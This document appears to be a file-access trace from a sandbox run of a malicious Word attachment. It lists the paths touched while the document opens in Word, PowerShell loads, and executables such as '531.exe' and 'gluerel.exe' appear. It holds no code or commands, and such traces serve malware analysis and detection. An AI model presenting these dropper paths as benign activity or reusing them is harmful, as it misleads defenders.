C:\Program Files (x86)\Microsoft Office\Office14\msth3??.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\msth3??.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\msth3??.dll
C:\Program Files (x86)\Microsoft Office\Office14\msth32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\msth32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\msth32.dll
C:\Program Files (x86)\Microsoft Office\Office14\msth??32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\msth??32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\msth??32.dll
C:\Program Files (x86)\Microsoft Office\Office14\msth232.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\msth232.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\msth232.dll
C:\Program Files (x86)\Microsoft Office\Office14\mshy3??.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\mshy3??.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\mshy3??.dll
C:\Program Files (x86)\Microsoft Office\Office14\hyph??32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\hyph??32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\hyph??32.dll
C:\Program Files (x86)\Microsoft Office\Office14\mshy32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\mshy32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\mshy32.dll
C:\Program Files (x86)\Microsoft Office\Office14\hyph32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\hyph32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\hyph32.dll
C:\Program Files (x86)\Microsoft Office\Office14\hhc32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\hhc32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\hhc32.dll
C:\Program Files (x86)\Microsoft Office\Office14\msdcsc32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\msdcsc32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\msdcsc32.dll
C:\Program Files (x86)\Microsoft Office\Office14\msproof7.dll
C:\Users\user\AppData\Roaming\Microsoft\UProof\
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
C:\Program Files (x86)\Microsoft Office\Office14\PROOF\1033\MSGR3EN.DLL
C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSGR3EN.LEX
C:\Windows\sysnative\spool\drivers\x64\3\sendtoonenote.BUD
C:\Windows\sysnative\spool\drivers\x64\3\sendtoonenote.gpd
C:\Windows\sysnative\spool\drivers\x64\3\stdnames.gpd
C:\Windows\sysnative\spool\drivers\x64\3\SendToOneNoteNames.gpd
C:\Windows\sysnative\spool\drivers\x64\3\SendToOneNoteFilter.gpd
C:\Windows\sysnative\spool\drivers\x64\3\SendToOneNote.ini
C:\Windows\sysnative\wbem\WmiPrvSE.exe
C:\Windows\sysnative\wbem\repository
C:\Windows\sysnative\wbem\Logs
C:\Windows\sysnative\wbem\AutoRecover
C:\Windows\sysnative\wbem\MOF
C:\Windows\sysnative\wbem\repository\INDEX.BTR
C:\Windows\sysnative\wbem\repository\WRITABLE.TST
C:\Windows\sysnative\wbem\repository\MAPPING1.MAP
C:\Windows\sysnative\wbem\repository\MAPPING2.MAP
C:\Windows\sysnative\wbem\repository\MAPPING3.MAP
C:\Windows\sysnative\wbem\repository\OBJECTS.DATA
C:\Windows\sysnative\wbem\repository\WBEM9xUpgd.dat
\??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER
\??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM
C:\Windows\sysnative\wbem\Logs\
C:\Windows\Temp
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\sysnative
C:\Windows\sysnative\WindowsPowerShell\v1.0
::\
::\{2559A1F3-21D7-11D4-BDAF-00C04F60B9F0}
::\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
::\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}
::\{2559A1F1-21D7-11D4-BDAF-00C04F60B9F0}
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
::\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
C:\ProgramData\Microsoft\Windows\Start Menu\Programs
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
C:\Windows\sysnative\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk\desktop.ini
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\powershell.exe.mui
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
\??\PIPE\srvsvc
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\
C:\Windows\sysnative\windowspowershell\v1.0\powershell_ise.exe
C:\Windows\sysnative\windowspowershell
C:\Windows\sysnative\WindowsPowerShell
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell_ise.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\
C:\Windows\hh.exe
C:\Windows\
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BF9JT9UPQS3TEN97KVRT.temp
C:\Windows\sysnative\mscoree.dll.local
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework64\*
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe.config
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe.Local\
C:\Windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6
C:\Windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\msvcr80.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_64\index169.dat
C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\9469491f37d9c35b596968b206615309\mscorlib.ni.dll
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ole32.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\OLEAUT32.dll
C:\Windows\Globalization\en-gb.nlp
C:\Windows\Globalization\en-us.nlp
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.config
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_64\System\adff7dd9fe8e541775c46b6363401b22\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b023321bc53c20c10ccbbd8f78c82c82\Microsoft.PowerShell.ConsoleHost.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.INI
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management.A#\009a09f5b2322bb8c5520dc5ddbb28bb\System.Management.Automation.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.INI
C:\Windows\sysnative\l_intl.nls
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ntdll.dll
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Core\83e2f6909980da7347e7806d8c26670e\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\ec50af274bf7a15fb59ac1f0d353b7ea\Microsoft.PowerShell.Commands.Diagnostics.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.INI
C:\Windows\assembly\GAC_MSIL\System.Core\3.5.0.0__b77a5c561934e089\System.Core.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuratio#\fcf35536476614410e0b0bd0e412199e\System.Configuration.Install.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Man#\8cd73e65058ef6f77f36b62a74ec3344\Microsoft.WSMan.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.INI
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Transactions\051655963f24f9ade08486084c570086\System.Transactions.ni.dll
C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.INI
C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\cdf48153115fc0bb466f37b7dcad9ac5\Microsoft.PowerShell.Commands.Utility.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\9206dc8156588e608d405729c833edc5\Microsoft.PowerShell.Commands.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b5a6a5ce3cd3d4dd2b151315c612aeff\Microsoft.PowerShell.Security.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.INI
C:\Windows\Globalization\en.nlp
C:\Windows\assembly\GAC_64\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources\Microsoft.PowerShell.ConsoleHost.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources\Microsoft.PowerShell.ConsoleHost.resources.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\en-US\mscorrc.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\en-US\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\en\mscorrc.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\en\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\ee795155543768ea67eecddc686a1e9e\System.Xml.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\c44929bde355680c886f8a52f5e22b81\System.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.DirectorySer#\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\System.DirectoryServices.ni.dll
C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.INI
C:\Windows\assembly\GAC_64\System.Management.Automation.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC_MSIL\System.Management.Automation.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC\System.Management.Automation.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources\System.Management.Automation.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources\System.Management.Automation.resources.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\GetEvent.types.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\types.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\WSMan.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Certificate.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\FileSystem.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Help.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Registry.format.ps1xml
C:\Windows\sysnative\tzres.dll
C:\Windows\assembly\GAC_64\Microsoft.WSMan.Management.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC\Microsoft.WSMan.Management.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.WSMan.Management.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.WSMan.Management.resources\Microsoft.WSMan.Management.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.WSMan.Management.resources.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.WSMan.Management.resources\Microsoft.WSMan.Management.resources.exe
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\secur32.dll
C:\Windows\assembly\GAC_64\Microsoft.PowerShell.Security.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC\Microsoft.PowerShell.Security.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Security.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Security.resources\Microsoft.PowerShell.Security.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Security.resources.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Security.resources\Microsoft.PowerShell.Security.resources.exe
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data\accc3a5269658c8c47fe3e402ac4ac1c\System.Data.ni.dll
C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data.INI
C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\profile.ps1
C:\Windows\sysnative\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1
C:\Users\user\Documents\WindowsPowerShell\profile.ps1
C:\Users\user\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuration\091b931d0f6408001747dbbbb05dbe66\System.Configuration.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.INI
C:\Users\user\531.exe
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\rasapi32.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ws2_32.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\winhttp.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\iphlpapi.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\security.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\shell32.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.308.14888764
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.308.14888764
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.308.14888764
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp
C:\Windows\ServiceProfiles
C:\Windows\ServiceProfiles\NetworkService
C:\Windows\sysnative\bthserv.dll
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\osppobjs-spp-plugin-manifest-signed.xrm-ms
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPOBJS.DLL
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\DNSAPI.dll
C:\Windows\sysnative\dnsapi.dll
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\Cache\
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\Cache\cache.dat
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat.bak
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat
C:
\??\PhysicalDrive0
\??\pci#ven_8086&dev_100f&subsys_075015ad&rev_01#4&3ad87e0a&0&0888#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{6aee89dd-bcbc-4329-b07b-c7eec7efd7ec}
\??\root#*6to4mp#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{fe09e92d-e089-4750-ba5d-f1dc277d4029}
\??\root#*isatap#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{20ae6bf1-f960-4e04-a1f8-4706fc316b77}
\??\root#ms_agilevpnminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{29898c9d-b0a4-4fef-bdb6-57a562022cee}
\??\root#ms_l2tpminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{e43d242b-9eab-4626-a952-46649fbb939a}
\??\root#ms_ndiswanbh#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\ndiswanbh
\??\root#ms_ndiswanip#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\ndiswanip
\??\root#ms_ndiswanipv6#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\ndiswanipv6
\??\root#ms_pppoeminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{8e301a52-affa-4f49-b9ca-c79096a1a056}
\??\root#ms_pptpminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{df4a9d2c-8742-4eb1-8703-d395c4183f33}
\??\root#ms_sstpminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{71f897d7-eb7c-4d8d-89db-ac80d9dd2270}
\??\root#system#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{eeab7790-c514-11d1-b42b-00805fc1270e}&asyncmac
\??\sw#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{78032b7e-4968-42d3-9f37-287ea86c0aaa}
C:\Windows\sysnative\Tasks\OfficeSoftwareProtectionPlatform
C:\Windows\sysnative\Tasks\OfficeSoftwareProtectionPlatform\*
C:\Windows\sysnative\Tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask
\Device\LanmanDatagramReceiver
C:\Windows\SysWOW64\sc.exe
C:\Windows\SysWOW64\*.*
C:\Windows\SysWOW64\en-US\sc.exe.mui
C:\Windows\SysWOW64\ui\SwDRM.dll
C:\Windows\SysWOW64\gluerel.exe
C:\Windows\appcompat\Programs\RecentFileCache.bcf
C:\Windows\SysWOW64\dafpanes.exe
C:\Windows\SysWOW64\gluerel.exe:Zone.Identifier
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{7531C624-7656-11E9-A15D-000C29BA3DA7}.dat
C:\Program Files (x86)\Internet Explorer\ieproxy.dll
C:\Users\user\AppData\Local\Temp\~DF80447823E3B1CDC0.TMP
C:\Windows\System32\url.dll
C:\
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db
C:\Users\desktop.ini
C:\Users
C:\Users\user
C:\Users\user\Favorites\desktop.ini
C:\Users\user\Desktop\desktop.ini
C:\Users\user\Favorites
C:\Users\user\Favorites\Links\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\frameiconcache.dat
C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
C:\Windows\SysWOW64\en-US\MSCTF.dll.mui
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7531C625-7656-11E9-A15D-000C29BA3DA7}.dat
C:\Users\user\AppData\Local\Temp\~DF3CDA1F11F8A81DB4.TMP
C:\Users\user\Favorites\Links
C:\Windows\SysWOW64\ieframe.dll
C:\Windows\SysWOW64\stdole2.tlb
C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms
\Device\KsecDD
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Program Files (x86)\Internet Explorer\IEShims.dll
C:\Windows\SysWOW64\shell32.dll
C:\Program Files (x86)\Internet Explorer\sqmapi.dll
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\index.dat
C:\Windows\Fonts\staticcache.dat
C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
C:\Windows\AppPatch\sysmain.sdb
C:\Program Files (x86)\Microsoft Office\Office14\
C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
\??\PIPE\samr
C:\Windows\winsxs\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\comctl32.dll.mui
C:\Windows\Installer\{90140000-003D-0000-0000-0000000FF1CE}\wordicon.exe
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\INC_655521240103US_May_14_2019[1].doc
C:\Program Files (x86)\Windows Defender\MpClient.dll
C:\Program Files (x86)\Windows Defender\MsMpLics.dll
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\INC_655521240103US_May_14_2019[1].doc:Zone.Identifier
C:\Users\user\Searches\desktop.ini
C:\Users\user\Videos\desktop.ini
C:\Users\user\Pictures\desktop.ini
C:\Users\user\Contacts\desktop.ini
C:\Users\user\Music\desktop.ini
C:\Users\user\Downloads\desktop.ini
C:\Users\user\Documents\desktop.ini
C:\Users\user\Links\desktop.ini
C:\Users\user\Saved Games\desktop.ini
C:\Windows\System32\shdocvw.dll
C:\Windows\System32\
C:\Windows\System32\en-US\shdocvw.dll.mui
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Windows\winsxs\FileMaps\program_files_x86_microsoft_office_office14_295527d9bd5a393d.cdf-ms
C:\Windows\AppPatch\pcamain.sdb
C:\Users\Public\desktop.ini
C:\Users\Public
C:\Users\Public\Desktop\desktop.ini
C:\Users\user\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Links
C:\Windows\sysnative\ieframe.dll
C:\Users\user\{1777F761-68AD-4D8A-87BD-30B759FA33DD}
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
C:\Program Files (x86)\desktop.ini
C:\Program Files (x86)\Internet Explorer\iexplore.exe.Manifest
C:\program files (x86)\internet explorer\iexplore.exe
C:\program files (x86)\internet explorer\en-US\iexplore.exe.mui
C:\Windows\Branding\ShellBrd\shellbrd.dll
C:\Users\user\Desktop
C:\Users\Public\Desktop
C:\Users\user\AppData
C:\Users\user\AppData\Roaming
C:\Users\user\AppData\Roaming\Microsoft\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft
C:\Users\user\AppData\Roaming\Microsoft\Windows
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
C:\ProgramData
C:\ProgramData\Microsoft\desktop.ini
C:\ProgramData\Microsoft
C:\ProgramData\Microsoft\Windows
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\slideshow.ini
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE.3.Manifest
C:\Program Files (x86)\Microsoft Office\Office14\WWLIB.DLL
C:\Program Files (x86)\Microsoft Office\Office14\GFX.DLL
C:\Windows\System32\wtsapi32.dll
C:\Windows\System32\msimg32.dll
C:\Program Files (x86)\Microsoft Office\Office14\OART.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSO.DLL
C:\Windows\System32\msi.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\
C:\Users\user\AppData\Local\Temp\CVR867E.tmp
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
C:\Program Files (x86)\Microsoft Office\Office14\1033\WWINTL.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\1033\MSOINTL.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSORES.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSPTLS.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\RICHED20.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
